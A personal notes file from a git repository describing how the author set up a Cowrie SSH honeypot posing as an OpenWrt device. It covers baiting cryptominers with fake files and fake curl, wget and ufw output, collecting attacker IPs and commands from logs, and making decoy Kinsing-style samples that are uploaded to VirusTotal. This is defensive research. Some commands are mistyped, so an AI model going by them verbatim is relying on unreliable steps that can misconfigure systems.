58e5f19 added useful one liners I used a lot
~alienagain pushed to ~alienagain/honeypot_notes git
Following this manual I configured a cowrie environment in a VPS:
1.1 Changing the Port 22 to port between 49152 and 65535.
sudo nvim /etc/ssh/sshd_config
1.2 Restart service
sudo systemctl restart ssh
sudo systemctl status ssh
1.3 Install software
sudo apt install -y python-virtualenv libssl-dev libffi-dev build-essential libpython3-dev python3-minimal authbind git
1.4 Create passwordless user cowrie
sudo adduser --disabled-password cowrie
1.5 Installing authbind, running the command and changing ownership
sudo apt install authbind
sudo touch /etc/authbind/byport/22
sudo chown cowrie:cowrie /etc/authbind/byport/22
1.6 Changing permissions
sudo chmod 770 /etc/authbind/byport/22
1.7 Login as cowrie and going "home"
sudo su cowrie
cd ~
1.8 Clonning the cowrie repo and entering it
git clone https://github.com/micheloosterhof/cowrie
cd cowrie
1.9 Create new configuration
cp etc/cowrie.cfg.dist etc/cowrie.cfg
1.10 Edit the file and replacing 2222 with 22 in listen_endpoints
nvim etc/cowrie.cfg
in the file:
listen_endpoints = tcp:2222:interface=0.0.0.0
to
listen_endpoints = tcp:22:interface=0.0.0.0
1.11 create virtual environment and enable it
virtualenv cowrie-env
source cowrie-env/bin/activate
1.12 Updating pip
pip install pip3
1.13 Install requirements
pip3 install -r requirements.txt
1.14 Starting cowrie
bin/cowrie start
1.15 Checking the honeypot
netstat -tan
2.1 Copying a docker image
In my case I wanted to imitate an IoT Linux device to investigate ssh bruteforce related to cryptomining. So I'm copying a docker system based on openwrt. First I logged off cowrie and in the default sudoer, I performed:
$ sudo docker create --name dummy openwrtorg/rootfs:x86-64
$ for i in proc usr sbin sys lib etc bin; do sudo docker cp dummy:$i /tmp/picklefs; done
Now I have a copy of the whole openwrt filesystem. I want to create this filesystem in cowrie so:
$ ./home/cowrie/cowrie/bin/createfs -l /tmp/picklefs -d 6 -o /home/cowrie/cowrie/share/cowrie/honeyfs.pickle
The default pickle system is fs.pickle, I did a backup of it and changed the name of the new one:
$ cd /home/cowrie/cowrie/share/cowrie/
$ mv honeyfs.pickle fs.pickle
I also needed to copy in /cowrie/cowrie/etc/ the filesystem, so I used the /tmp/ copy for that.
$ cd /home/cowrie/cowrie/honeyfs
$ rm rf *
$ cp /tmp/picklefs .
The filesystem is copied but I wanted to add some stuff. In the case of cryptominers, most of them attempt a few things:
So I wanted to put some stuff around to make it "easier" for a cryptominer to be comfortable.
2.2 LD PRELOAD
First creating an empty ld.so.preload file. I used a nice tool of cowrie to interact with the fake filesystem. In the cowrie repo home directory:
$ sudo su cowrie
$ source cowrie-env/bin/activate
(cowrie-env) cowrie@<myvps>:~/cowrie$ ./bin/fsctl share/cowrie/fs.pickle
A shell should open, and then I went like:
Kippo/Cowrie file system interactive editor
Donovan Hubbard, Douglas Hubbard, March 2013
Type 'help' for help
fs.pickle:/$ cd /etc/
fs.pickle:/etc$ touch ld.so.preload
2.3 Generating ssh content
On cowrie user without the source activated, in /home/cowrie/cowrie/honeyfs:
$ mkdir .ssh
$ mkdir .ssh/config
$ cd .ssh/config
$ ssh-keygen
in the dir and file choice, I choosed the current folder. Later I tried to ssh a beacon address using the same key and saved the known_hosts file in the same folder, too. I went to the shell and added the same files.
2.4 Deleting competition and configuring wget and curl
In /cowrie/share/cowrie/txtcmds/bin created the files curl and wget with fake error messages:
$ touch curl wget
$ nvim curl
...
$ nvim wget
...
Since I was already doing this I added ufw too. In enable file I added fake services with names commonly seen in other cryptominers, so it's seen if any enumeration is attempted.
When everything was done, I tested it. First, activating the virtualenv and then in the cowrie repo directory:
$ bin/cowrie stop
$ bin/cowrie start
And attempted to connect using another console:
$ ssh -p 22 root@<myip>
I played around a bit in the fake shell and exited. Then I took a look at cowrie/var/log/cowrie. After a day I saw in the logs how some IPs attemped to connect so I created a script to extract those IP's directly:
#!/bin/bash
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
cat cowrie.json.$yesterday | grep "New connection:" > connections
#file=connections
while read -r line; do
# echo "DEBUG READIN LINE:"
# echo $line
ejem=$(echo $line)
# echo "DEBUG SAVING CONNECTION"
step1=${ejem##*connection:}
# echo "step1 = $step1"
step2=${step1%%(*}
# echo "step2 = $step2"
echo $step2 >> collectedIPs_raw
done <connections
awk '!a[$0]++' collectedIPs_raw > collectedIPs
rm collectedIPs_raw
rm connections
I then investigated the IPs in collectedIPs, ignoring my own. I also wanted to investigate commands so I did:
#!/bin/bash
yesterday=$(date -d "yesterday 13:00" '+%Y-%m-%d')
cat cowrie.json.$yesterday | grep "input" > commands
In my local computer I took those files:
#!/bin/bash
if [ "$1" = "IPS" ]; then
echo "collecting IPs"
scp -P <my_real_port> <myuser>@<myip>:/home/cowrie/cowrie/var/log/cowrie/collectedIPs .
elif [ "$1" = "commands" ]; then
echo "collecting commands"
scp -P <my_real_port> <myuser>@<myip>:/home/cowrie/cowrie/var/log/cowrie/commands .
else
echo "ERROR"
fi
So all I had to do is:
$ myscript IPS
or:
$ myscript commands
As I said, most cryptominers try to delete other competitors. I created a realistic kinsing sample which downloads a "cryptomining binary" from a webserver I'm also serving myself. The rest of the sample looks exactly like a real kinsing miner downloader.
The binary is an elf compiled from bash which has some real but safe miner string lines that trigger YARA alerts of miners in linux, but also attemps to ssh the honeypot shell in a oneliner. I uploaded both on VT, the fake downloader and the fake binary :)
So far, a few IPS attempted to connect, most of them are digital ocean IPs that are related to malware and sshbrute forcers. A couple of them attempted to TLS handshake as an attempt to connect using https protocol.